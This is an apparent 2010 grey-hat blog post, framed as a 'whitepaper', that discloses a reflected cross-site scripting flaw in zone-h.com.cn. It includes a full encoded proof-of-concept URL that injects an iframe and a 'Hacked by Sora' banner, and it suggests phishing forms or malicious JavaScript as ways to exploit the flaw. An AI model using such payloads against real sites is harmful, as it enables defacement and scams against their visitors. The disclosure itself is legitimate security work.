[whitepaper] Zone-H (CN) XSS Vulnerability

.__
____________   ____   ____           |  |__               ____   ____
\___   /  _ \ /    \_/ __ \   ______ |  |  \    ______  _/ ___\ /    \
/    (  <_> )   |  \  ___/  /_____/ |   Y  \  /_____/  \  \___|   |  \
/_____ \____/|___|  /\___  >         |___|  /            \___  >___|  /
\/          \/     \/               \/                 \/     \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

————————
1. INFORMATION         |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————
2. DESCRIPTION         |
————————
http://www.zone-h.com.cn/ suffers from a cross site scripting vulnerability. This vulnerability can be exploited in many ways.
An example is creating a form to scam other people, or to execute malicious javascript code on the victim’s computer.

————————
3. PROOF OF CONCEPT    |
————————

HTML Code:
http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+%5Bat%5D+hotmail+%5Bdot%5D+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Advertisements

2 Responses to “[whitepaper] Zone-H (CN) XSS Vulnerability”

  1. merci pour les information

  2. You are welcome, Dr BiLLi HaCkEr.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: